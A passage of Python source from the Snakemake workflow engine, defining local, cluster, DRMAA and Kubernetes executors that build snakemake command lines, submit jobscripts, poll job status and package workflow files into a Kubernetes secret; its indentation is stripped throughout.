"""Return a string to add to self.exec_job that includes additional
arguments from the command line. This is currently used in the
ClusterExecutor and CPUExecutor, as both were using the same
code. Both have base class of the RealExecutor.
"""
additional = ""
if not self.workflow.cleanup_scripts:
additional += " --skip-script-cleanup "
if self.workflow.shadow_prefix:
additional += " --shadow-prefix {} ".format(self.workflow.shadow_prefix)
if self.workflow.use_conda:
additional += " --use-conda "
if self.workflow.conda_prefix:
additional += " --conda-prefix {} ".format(self.workflow.conda_prefix)
if self.workflow.conda_base_path and self.assume_shared_fs:
additional += " --conda-base-path {} ".format(
self.workflow.conda_base_path
)
if self.workflow.use_singularity:
additional += " --use-singularity "
if self.workflow.singularity_prefix:
additional += " --singularity-prefix {} ".format(
self.workflow.singularity_prefix
)
if self.workflow.singularity_args:
additional += ' --singularity-args "{}"'.format(
self.workflow.singularity_args
)
if not self.workflow.execute_subworkflows:
additional += " --no-subworkflows "
if self.workflow.max_threads is not None:
additional += " --max-threads {} ".format(self.workflow.max_threads)
additional += self.get_set_resources_args()
additional += self.get_set_scatter_args()
additional += self.get_set_threads_args()
additional += self.get_behavior_args()
if self.workflow.use_env_modules:
additional += " --use-envmodules "
if not self.keepmetadata:
additional += " --drop-metadata "
return additional
def format_job_pattern(self, pattern, job=None, **kwargs):
overwrite_workdir = []
if self.workflow.overwrite_workdir:
overwrite_workdir.extend(("--directory", self.workflow.overwrite_workdir))
overwrite_config = []
if self.workflow.overwrite_configfiles:
# add each of the overwriting configfiles in the original order
if self.workflow.overwrite_configfiles:
overwrite_config.append("--configfiles")
overwrite_config.extend(self.workflow.overwrite_configfiles)
if self.workflow.config_args:
overwrite_config.append("--config")
overwrite_config.extend(self.workflow.config_args)
printshellcmds = ""
if self.workflow.printshellcmds:
printshellcmds = "-p"
if not job.is_branched and not job.is_updated:
# Restrict considered rules. This does not work for updated jobs
# because they need to be updated in the spawned process as well.
rules = ["--allowed-rules"]
rules.extend(job.rules)
else:
rules = []
target = kwargs.get("target", job.get_targets())
snakefile = kwargs.get("snakefile", self.snakefile)
cores = kwargs.get("cores", self.cores)
if "target" in kwargs:
del kwargs["target"]
if "snakefile" in kwargs:
del kwargs["snakefile"]
if "cores" in kwargs:
del kwargs["cores"]
cmd = format(
pattern,
job=job,
attempt=job.attempt,
overwrite_workdir=overwrite_workdir,
overwrite_config=overwrite_config,
printshellcmds=printshellcmds,
workflow=self.workflow,
snakefile=snakefile,
cores=cores,
benchmark_repeats=job.benchmark_repeats if not job.is_group() else None,
target=target,
rules=rules,
**kwargs,
)
return cmd
class TouchExecutor(RealExecutor):
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
try:
# Touching of output files will be done by handle_job_success
time.sleep(0.1)
callback(job)
except OSError as ex:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job, ignore_missing_output=True)
_ProcessPoolExceptions = (KeyboardInterrupt,)
try:
from concurrent.futures.process import BrokenProcessPool
_ProcessPoolExceptions = (KeyboardInterrupt, BrokenProcessPool)
except ImportError:
pass
class CPUExecutor(RealExecutor):
def __init__(
self,
workflow,
dag,
workers,
printreason=False,
quiet=False,
printshellcmds=False,
use_threads=False,
latency_wait=3,
cores=1,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.exec_job = "\\\n".join(
(
"cd {workflow.workdir_init} && ",
"{sys.executable} -m snakemake {target} --snakefile {snakefile} ",
"--force --cores {cores} --keep-target-files --keep-remote ",
"--attempt {attempt} --scheduler {workflow.scheduler_type} ",
"--force-use-threads --wrapper-prefix {workflow.wrapper_prefix} ",
"--max-inventory-time 0 --ignore-incomplete ",
"--latency-wait {latency_wait} ",
self.get_default_remote_provider_args(),
self.get_default_resources_args(),
"{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} ",
"--notemp --quiet --no-hooks --nolock --mode {} ".format(
Mode.subprocess
),
)
)
self.exec_job += self.get_additional_args()
self.use_threads = use_threads
self.cores = cores
# Zero thread jobs do not need a thread, but they occupy additional workers.
# Hence we need to reserve additional workers for them.
self.workers = workers + 5
self.pool = concurrent.futures.ThreadPoolExecutor(max_workers=self.workers)
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
if job.is_group():
# if we still don't have enough workers for this group, create a new pool here
missing_workers = max(len(job) - self.workers, 0)
if missing_workers:
self.workers += missing_workers
self.pool = concurrent.futures.ThreadPoolExecutor(
max_workers=self.workers
)
# the future waits for the entire group job
future = self.pool.submit(self.run_group_job, job)
else:
future = self.run_single_job(job)
future.add_done_callback(partial(self._callback, job, callback, error_callback))
def job_args_and_prepare(self, job):
job.prepare()
conda_env = job.conda_env_path if self.workflow.use_conda else None
container_img = (
job.container_img_path if self.workflow.use_singularity else None
)
env_modules = job.env_modules if self.workflow.use_env_modules else None
benchmark = None
benchmark_repeats = job.benchmark_repeats or 1
if job.benchmark is not None:
benchmark = str(job.benchmark)
return (
job.rule,
job.input._plainstrings(),
job.output._plainstrings(),
job.params,
job.wildcards,
job.threads,
job.resources,
job.log._plainstrings(),
benchmark,
benchmark_repeats,
conda_env,
container_img,
self.workflow.singularity_args,
env_modules,
self.workflow.use_singularity,
self.workflow.linemaps,
self.workflow.debug,
self.workflow.cleanup_scripts,
job.shadow_dir,
job.jobid,
self.workflow.edit_notebook,
self.workflow.conda_base_path,
job.rule.basedir,
)
def run_single_job(self, job):
if self.use_threads or (not job.is_shadow and not job.is_run):
future = self.pool.submit(
self.cached_or_run, job, run_wrapper, *self.job_args_and_prepare(job)
)
else:
# run directive jobs are spawned into subprocesses
future = self.pool.submit(self.cached_or_run, job, self.spawn_job, job)
return future
def run_group_job(self, job):
"""Run a pipe group job.
This lets all items run simultaneously."""
# we only have to consider pipe groups because in local running mode,
# these are the only groups that will occur
futures = [self.run_single_job(j) for j in job]
while True:
k = 0
for f in futures:
if f.done():
ex = f.exception()
if ex is not None:
# kill all shell commands of the other group jobs
# there can be only shell commands because the
# run directive is not allowed for pipe jobs
for j in job:
shell.kill(j.jobid)
raise ex
else:
k += 1
if k == len(futures):
return
time.sleep(1)
def spawn_job(self, job):
exec_job = self.exec_job
cmd = self.format_job_pattern(
exec_job, job=job, _quote_all=True, latency_wait=self.latency_wait
)
try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError as e:
raise SpawnedJobError()
def cached_or_run(self, job, run_func, *args):
"""
Either retrieve result from cache, or run job with given function.
"""
to_cache = self.workflow.is_cached_rule(job.rule)
try:
if to_cache:
self.workflow.output_file_cache.fetch(job)
return
except CacheMissException:
pass
run_func(*args)
if to_cache:
self.workflow.output_file_cache.store(job)
def shutdown(self):
self.pool.shutdown()
def cancel(self):
self.pool.shutdown()
def _callback(self, job, callback, error_callback, future):
try:
ex = future.exception()
if ex is not None:
raise ex
callback(job)
except _ProcessPoolExceptions:
self.handle_job_error(job)
# no error callback, just silently ignore the interrupt as the main scheduler is also killed
except SpawnedJobError:
# don't print error message, this is done by the spawned subprocess
error_callback(job)
except (Exception, BaseException) as ex:
self.print_job_error(job)
if not (job.is_group() or job.shellcmd) or self.workflow.verbose:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job)
def handle_job_error(self, job):
super().handle_job_error(job)
if not self.keepincomplete:
job.cleanup()
self.workflow.persistence.cleanup(job)
class ClusterExecutor(RealExecutor):
"""Backend for distributed execution.
The key idea is that a job is converted into a script that invokes Snakemake again, in whatever environment is targeted. The script is submitted to some job management platform (e.g. a cluster scheduler like slurm).
This class can be specialized to generate more specific backends, also for the cloud.
"""
default_jobscript = "jobscript.sh"
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{name}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
cluster_config=None,
local_input=None,
restart_times=None,
exec_job=None,
assume_shared_fs=True,
max_status_checks_per_second=1,
disable_default_remote_provider_args=False,
disable_get_default_resources_args=False,
keepincomplete=False,
keepmetadata=True,
):
from ratelimiter import RateLimiter
local_input = local_input or []
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
assume_shared_fs=assume_shared_fs,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
if not self.assume_shared_fs:
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.main_snakefile)
jobscript = workflow.jobscript
if jobscript is None:
jobscript = os.path.join(os.path.dirname(__file__), self.default_jobscript)
try:
with open(jobscript) as f:
self.jobscript = f.read()
except IOError as e:
raise WorkflowError(e)
if not "jobid" in get_wildcard_names(jobname):
raise WorkflowError(
'Defined jobname ("{}") has to contain the wildcard {jobid}.'
)
if exec_job is None:
self.exec_job = "\\\n".join(
(
"{envvars} " "cd {workflow.workdir_init} && "
if assume_shared_fs
else "",
"{sys.executable} " if assume_shared_fs else "python ",
"-m snakemake {target} --snakefile {snakefile} ",
"--force --cores {cores} --keep-target-files --keep-remote --max-inventory-time 0 ",
"{waitfiles_parameter:u} --latency-wait {latency_wait} ",
" --attempt {attempt} {use_threads} --scheduler {workflow.scheduler_type} ",
"--wrapper-prefix {workflow.wrapper_prefix} ",
"{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} "
"--nocolor --notemp --no-hooks --nolock {scheduler_solver_path:u} ",
"--mode {} ".format(Mode.cluster),
)
)
else:
self.exec_job = exec_job
self.exec_job += self.get_additional_args()
if not disable_default_remote_provider_args:
self.exec_job += self.get_default_remote_provider_args()
if not disable_get_default_resources_args:
self.exec_job += self.get_default_resources_args()
self.jobname = jobname
self._tmpdir = None
self.cores = cores if cores else "all"
self.cluster_config = cluster_config if cluster_config else dict()
self.restart_times = restart_times
self.active_jobs = list()
self.lock = threading.Lock()
self.wait = True
self.wait_thread = threading.Thread(target=self._wait_thread)
self.wait_thread.daemon = True
self.wait_thread.start()
self.max_status_checks_per_second = max_status_checks_per_second
self.status_rate_limiter = RateLimiter(
max_calls=self.max_status_checks_per_second, period=1
)
def _wait_thread(self):
try:
self._wait_for_jobs()
except Exception as e:
self.workflow.scheduler.executor_error_callback(e)
def shutdown(self):
with self.lock:
self.wait = False
self.wait_thread.join()
if not self.workflow.immediate_submit:
# Only delete tmpdir (containing jobscripts) if not using
# immediate_submit. With immediate_submit, jobs can be scheduled
# after this method is completed. Hence we have to keep the
# directory.
shutil.rmtree(self.tmpdir)
def cancel(self):
self.shutdown()
def _run(self, job, callback=None, error_callback=None):
if self.assume_shared_fs:
job.remove_existing_output()
job.download_remote_input()
super()._run(job, callback=callback, error_callback=error_callback)
@property
def tmpdir(self):
if self._tmpdir is None:
self._tmpdir = tempfile.mkdtemp(dir=".snakemake", prefix="tmp.")
return os.path.abspath(self._tmpdir)
def get_jobscript(self, job):
f = job.format_wildcards(self.jobname, cluster=self.cluster_wildcards(job))
if os.path.sep in f:
raise WorkflowError(
"Path separator ({}) found in job name {}. "
"This is not supported.".format(os.path.sep, f)
)
return os.path.join(self.tmpdir, f)
def format_job(self, pattern, job, **kwargs):
wait_for_files = []
scheduler_solver_path = ""
if self.assume_shared_fs:
wait_for_files.append(self.tmpdir)
wait_for_files.extend(job.get_wait_for_files())
# Prepend PATH of current python executable to PATH.
# This way, we ensure that the snakemake process in the cluster node runs
# in the same environment as the current process.
# This is necessary in order to find the pulp solver backends (e.g. coincbc).
scheduler_solver_path = "--scheduler-solver-path {}".format(
os.path.dirname(sys.executable)
)
# Only create extra file if we have more than 20 input files.
# This should not require the file creation in most cases.
if len(wait_for_files) > 20:
wait_for_files_file = self.get_jobscript(job) + ".waitforfilesfile.txt"
with open(wait_for_files_file, "w") as fd:
fd.write("\n".join(wait_for_files))
waitfiles_parameter = format(
"--wait-for-files-file {wait_for_files_file}",
wait_for_files_file=wait_for_files_file,
)
else:
waitfiles_parameter = format(
"--wait-for-files {wait_for_files}", wait_for_files=wait_for_files
)
format_p = partial(
self.format_job_pattern,
job=job,
properties=job.properties(cluster=self.cluster_params(job)),
latency_wait=self.latency_wait,
waitfiles_parameter=waitfiles_parameter,
scheduler_solver_path=scheduler_solver_path,
**kwargs,
)
try:
return format_p(pattern)
except KeyError as e:
raise WorkflowError(
"Error formatting jobscript: {} not found\n"
"Make sure that your custom jobscript is up to date.".format(e)
)
def write_jobscript(self, job, jobscript, **kwargs):
# only force threads if this is not a group job
# otherwise we want proper process handling
use_threads = "--force-use-threads" if not job.is_group() else ""
envvars = " ".join(
"{}={}".format(var, os.environ[var]) for var in self.workflow.envvars
)
exec_job = self.format_job(
self.exec_job,
job,
_quote_all=True,
use_threads=use_threads,
envvars=envvars,
**kwargs,
)
content = self.format_job(self.jobscript, job, exec_job=exec_job, **kwargs)
logger.debug("Jobscript:\n{}".format(content))
with open(jobscript, "w") as f:
print(content, file=f)
os.chmod(jobscript, os.stat(jobscript).st_mode | stat.S_IXUSR | stat.S_IRUSR)
def cluster_params(self, job):
"""Return wildcards object for job from cluster_config."""
cluster = self.cluster_config.get("__default__", dict()).copy()
cluster.update(self.cluster_config.get(job.name, dict()))
# Format values with available parameters from the job.
for key, value in list(cluster.items()):
if isinstance(value, str):
try:
cluster[key] = job.format_wildcards(value)
except NameError as e:
if job.is_group():
msg = (
"Failed to format cluster config for group job. "
"You have to ensure that your default entry "
"does not contain any items that group jobs "
"cannot provide, like {rule}, {wildcards}."
)
else:
msg = (
"Failed to format cluster config "
"entry for job {}.".format(job.rule.name)
)
raise WorkflowError(msg, e)
return cluster
def cluster_wildcards(self, job):
return Wildcards(fromdict=self.cluster_params(job))
def handle_job_success(self, job):
super().handle_job_success(
job, upload_remote=False, handle_log=False, handle_touch=False
)
def handle_job_error(self, job):
# TODO what about removing empty remote dirs?? This cannot be decided
# on the cluster node.
super().handle_job_error(job, upload_remote=False)
logger.debug("Cleanup job metadata.")
# We have to remove metadata here as well.
# It will be removed by the CPUExecutor in case of a shared FS,
# but we might not see the removal due to filesystem latency.
# By removing it again, we make sure that it is gone on the host FS.
if not self.keepincomplete:
self.workflow.persistence.cleanup(job)
# Also cleanup the jobs output files, in case the remote job
# was not able to, due to e.g. timeout.
logger.debug("Cleanup failed jobs output files.")
job.cleanup()
def print_cluster_job_error(self, job_info, jobid):
job = job_info.job
kind = (
"rule {}".format(job.rule.name)
if not job.is_group()
else "group job {}".format(job.groupid)
)
logger.error(
"Error executing {} on cluster (jobid: {}, external: "
"{}, jobscript: {}). For error details see the cluster "
"log and the log files of the involved rule(s).".format(
kind, jobid, job_info.jobid, job_info.jobscript
)
)
GenericClusterJob = namedtuple(
"GenericClusterJob",
"job jobid callback error_callback jobscript jobfinished jobfailed",
)
class GenericClusterExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
statuscmd=None,
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
self.submitcmd = submitcmd
if not assume_shared_fs and statuscmd is None:
raise WorkflowError(
"When no shared filesystem can be assumed, a "
"status command must be given."
)
self.statuscmd = statuscmd
self.external_jobid = dict()
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
if statuscmd:
self.exec_job += " && exit 0 || exit 1"
elif assume_shared_fs:
# TODO wrap with watch and touch {jobrunning}
# check modification date of {jobrunning} in the wait_for_job method
self.exec_job += " && touch {jobfinished} || (touch {jobfailed}; exit 1)"
else:
raise WorkflowError(
"If no shared filesystem is used, you have to "
"specify a cluster status command."
)
def cancel(self):
logger.info("Will exit after finishing currently running jobs.")
self.shutdown()
def register_job(self, job):
# Do not register job here.
# Instead do it manually once the jobid is known.
pass
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
workdir = os.getcwd()
jobid = job.jobid
jobscript = self.get_jobscript(job)
jobfinished = os.path.join(self.tmpdir, "{}.jobfinished".format(jobid))
jobfailed = os.path.join(self.tmpdir, "{}.jobfailed".format(jobid))
self.write_jobscript(
job, jobscript, jobfinished=jobfinished, jobfailed=jobfailed
)
if self.statuscmd:
ext_jobid = self.dag.incomplete_external_jobid(job)
if ext_jobid:
# Job is incomplete and still running.
# We simply register it and wait for completion or failure.
logger.info(
"Resuming incomplete job {} with external jobid '{}'.".format(
jobid, ext_jobid
)
)
submit_callback(job)
with self.lock:
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
return
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
try:
ext_jobid = (
subprocess.check_output(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
)
.decode()
.split("\n")
)
except subprocess.CalledProcessError as ex:
logger.error(
"Error submitting jobscript (exit code {}):\n{}".format(
ex.returncode, ex.output.decode()
)
)
error_callback(job)
return
if ext_jobid and ext_jobid[0]:
ext_jobid = ext_jobid[0]
self.external_jobid.update((f, ext_jobid) for f in job.output)
logger.info(
"Submitted {} {} with external jobid '{}'.".format(
"group job" if job.is_group() else "job", jobid, ext_jobid
)
)
self.workflow.persistence.started(job, external_jobid=ext_jobid)
submit_callback(job)
with self.lock:
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
def _wait_for_jobs(self):
success = "success"
failed = "failed"
running = "running"
status_cmd_kills = set()
if self.statuscmd is not None:
def job_status(job, valid_returns=["running", "success", "failed"]):
try:
# this command shall return "success", "failed" or "running"
ret = subprocess.check_output(
"{statuscmd} {jobid}".format(
jobid=job.jobid, statuscmd=self.statuscmd
),
shell=True,
).decode()
except subprocess.CalledProcessError as e:
if e.returncode < 0:
# Ignore SIGINT and all other issues due to signals
# because it will be caused by hitting e.g.
# Ctrl-C on the main process or sending killall to
# snakemake.
# Snakemake will handle the signal in
# the main process.
status_cmd_kills.add(e.returncode)
if len(status_cmd_kills) > 10:
logger.info(
"Cluster status command {} was killed >10 times with signal(s) {} "
"(if this happens unexpectedly during your workflow execution, "
"have a closer look.).".format(
self.statuscmd, ",".join(status_cmd_kills)
)
)
status_cmd_kills.clear()
else:
raise WorkflowError(
"Failed to obtain job status. "
"See above for error message."
)
ret = ret.strip().split("\n")
if len(ret) != 1 or ret[0] not in valid_returns:
raise WorkflowError(
"Cluster status command {} returned {} but just a single line with one of {} is expected.".format(
self.statuscmd, "\\n".join(ret), ",".join(valid_returns)
)
)
return ret[0]
else:
def job_status(job):
if os.path.exists(active_job.jobfinished):
os.remove(active_job.jobfinished)
os.remove(active_job.jobscript)
return success
if os.path.exists(active_job.jobfailed):
os.remove(active_job.jobfailed)
os.remove(active_job.jobscript)
return failed
return running
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
# logger.debug("Checking status of {} jobs.".format(len(active_jobs)))
for active_job in active_jobs:
with self.status_rate_limiter:
status = job_status(active_job)
if status == success:
active_job.callback(active_job.job)
elif status == failed:
self.print_job_error(
active_job.job,
cluster_jobid=active_job.jobid
if active_job.jobid
else "unknown",
)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
else:
still_running.append(active_job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
SynchronousClusterJob = namedtuple(
"SynchronousClusterJob", "job jobid callback error_callback jobscript process"
)
class SynchronousClusterExecutor(ClusterExecutor):
"""
invocations like "qsub -sync y" (SGE) or "bsub -K" (LSF) are
synchronous, blocking the foreground thread and returning the
remote exit code at remote exit.
"""
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
restart_times=0,
assume_shared_fs=True,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=10,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.submitcmd = submitcmd
self.external_jobid = dict()
def cancel(self):
logger.info("Will exit after finishing currently running jobs.")
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
workdir = os.getcwd()
jobid = job.jobid
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
process = subprocess.Popen(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
)
submit_callback(job)
with self.lock:
self.active_jobs.append(
SynchronousClusterJob(
job, process.pid, callback, error_callback, jobscript, process
)
)
def _wait_for_jobs(self):
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
exitcode = active_job.process.poll()
if exitcode is None:
# job not yet finished
still_running.append(active_job)
elif exitcode == 0:
# job finished successfully
os.remove(active_job.jobscript)
active_job.callback(active_job.job)
else:
# job failed
os.remove(active_job.jobscript)
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
DRMAAClusterJob = namedtuple(
"DRMAAClusterJob", "job jobid callback error_callback jobscript"
)
class DRMAAExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
drmaa_args="",
drmaa_log_dir=None,
latency_wait=3,
cluster_config=None,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
try:
import drmaa
except ImportError:
raise WorkflowError(
"Python support for DRMAA is not installed. "
"Please install it, e.g. with easy_install3 --user drmaa"
)
except RuntimeError as e:
raise WorkflowError("Error loading drmaa support:\n{}".format(e))
self.session = drmaa.Session()
self.drmaa_args = drmaa_args
self.drmaa_log_dir = drmaa_log_dir
self.session.initialize()
self.submitted = list()
def cancel(self):
from drmaa.const import JobControlAction
from drmaa.errors import InvalidJobException, InternalException
for jobid in self.submitted:
try:
self.session.control(jobid, JobControlAction.TERMINATE)
except (InvalidJobException, InternalException):
# This is common - logging a warning would probably confuse the user.
pass
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
try:
drmaa_args = job.format_wildcards(
self.drmaa_args, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule)
import drmaa
if self.drmaa_log_dir:
makedirs(self.drmaa_log_dir)
try:
jt = self.session.createJobTemplate()
jt.remoteCommand = jobscript
jt.nativeSpecification = drmaa_args
if self.drmaa_log_dir:
jt.outputPath = ":" + self.drmaa_log_dir
jt.errorPath = ":" + self.drmaa_log_dir
jt.jobName = os.path.basename(jobscript)
jobid = self.session.runJob(jt)
except (
drmaa.DeniedByDrmException,
drmaa.InternalException,
drmaa.InvalidAttributeValueException,
) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)), self.workflow.linemaps
)
error_callback(job)
return
logger.info(
"Submitted DRMAA job {} with external jobid {}.".format(job.jobid, jobid)
)
self.submitted.append(jobid)
self.session.deleteJobTemplate(jt)
submit_callback(job)
with self.lock:
self.active_jobs.append(
DRMAAClusterJob(job, jobid, callback, error_callback, jobscript)
)
def shutdown(self):
super().shutdown()
self.session.exit()
def _wait_for_jobs(self):
import drmaa
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
try:
retval = self.session.wait(
active_job.jobid, drmaa.Session.TIMEOUT_NO_WAIT
)
except drmaa.ExitTimeoutException as e:
# job still active
still_running.append(active_job)
continue
except (drmaa.InternalException, Exception) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)),
self.workflow.linemaps,
)
os.remove(active_job.jobscript)
active_job.error_callback(active_job.job)
continue
# job exited
os.remove(active_job.jobscript)
if (
not retval.wasAborted
and retval.hasExited
and retval.exitStatus == 0
):
active_job.callback(active_job.job)
else:
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
@contextlib.contextmanager
def change_working_directory(directory=None):
"""Change working directory in execution context if provided."""
if directory:
try:
saved_directory = os.getcwd()
logger.info("Changing to shadow directory: {}".format(directory))
os.chdir(directory)
yield
finally:
os.chdir(saved_directory)
else:
yield
KubernetesJob = namedtuple(
"KubernetesJob", "job jobid callback error_callback kubejob jobscript"
)
class KubernetesExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
namespace,
container_image=None,
jobname="{rulename}.{jobid}",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
cluster_config=None,
local_input=None,
restart_times=None,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
exec_job = (
"cp -rf /source/. . && "
"snakemake {target} --snakefile {snakefile} "
"--force --cores {cores} --keep-target-files --keep-remote "
"--latency-wait {latency_wait} --scheduler {workflow.scheduler_type} "
" --attempt {attempt} {use_threads} --max-inventory-time 0 "
"--wrapper-prefix {workflow.wrapper_prefix} "
"{overwrite_config} {printshellcmds} {rules} --nocolor "
"--notemp --no-hooks --nolock "
)
super().__init__(
workflow,
dag,
None,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
local_input=local_input,
restart_times=restart_times,
exec_job=exec_job,
assume_shared_fs=False,
max_status_checks_per_second=10,
)
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.main_snakefile)
try:
from kubernetes import config
except ImportError:
raise WorkflowError(
"The Python 3 package 'kubernetes' "
"must be installed to use Kubernetes"
)
config.load_kube_config()
import kubernetes.client
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
self.namespace = namespace
self.envvars = workflow.envvars
self.secret_files = {}
self.run_namespace = str(uuid.uuid4())
self.secret_envvars = {}
self.register_secret()
self.container_image = container_image or get_container_image()
def register_secret(self):
import kubernetes.client
secret = kubernetes.client.V1Secret()
secret.metadata = kubernetes.client.V1ObjectMeta()
# create a random uuid
secret.metadata.name = self.run_namespace
secret.type = "Opaque"
secret.data = {}
for i, f in enumerate(self.workflow.get_sources()):
if f.startswith(".."):
logger.warning(
"Ignoring source file {}. Only files relative "
"to the working directory are allowed.".format(f)
)
continue
# The kubernetes API can't create secret files larger than 1MB.
source_file_size = os.path.getsize(f)
max_file_size = 1048576
if source_file_size > max_file_size:
logger.warning(
"Skipping the source file {f}. Its size {source_file_size} exceeds "
"the maximum file size (1MB) that can be passed "
"from host to kubernetes.".format(
f=f, source_file_size=source_file_size
)
)
continue
with open(f, "br") as content:
key = "f{}".format(i)
# Some files are smaller than 1MB, but grows larger after being base64 encoded
# We should exclude them as well, otherwise Kubernetes APIs will complain
encoded_contents = base64.b64encode(content.read()).decode()
encoded_size = len(encoded_contents)
if encoded_size > 1048576:
logger.warning(
"Skipping the source file {f} for secret key {key}. "
"Its base64 encoded size {encoded_size} exceeds "
"the maximum file size (1MB) that can be passed "
"from host to kubernetes.".format(
f=f,
source_file_size=source_file_size,
key=key,
encoded_size=encoded_size,
)
)
continue
self.secret_files[key] = f
secret.data[key] = encoded_contents
for e in self.envvars:
try:
key = e.lower()
secret.data[key] = base64.b64encode(os.environ[e].encode()).decode()
self.secret_envvars[key] = e
except KeyError:
continue
# Test if the total size of the configMap exceeds 1MB
config_map_size = sum(
[len(base64.b64decode(v)) for k, v in secret.data.items()]
)
if config_map_size > 1048576:
logger.warning(
"The total size of the included files and other Kubernetes secrets "
"is {}, exceeding the 1MB limit.\n".format(config_map_size)
)
logger.warning(
"The following are the largest files. Consider removing some of them "
"(you need remove at least {} bytes):".format(config_map_size - 1048576)
)
entry_sizes = {
self.secret_files[k]: len(base64.b64decode(v))
for k, v in secret.data.items()
if k in self.secret_files
}
for k, v in sorted(entry_sizes.items(), key=lambda item: item[1])[:-6:-1]:
logger.warning(" * File: {k}, original size: {v}".format(k=k, v=v))
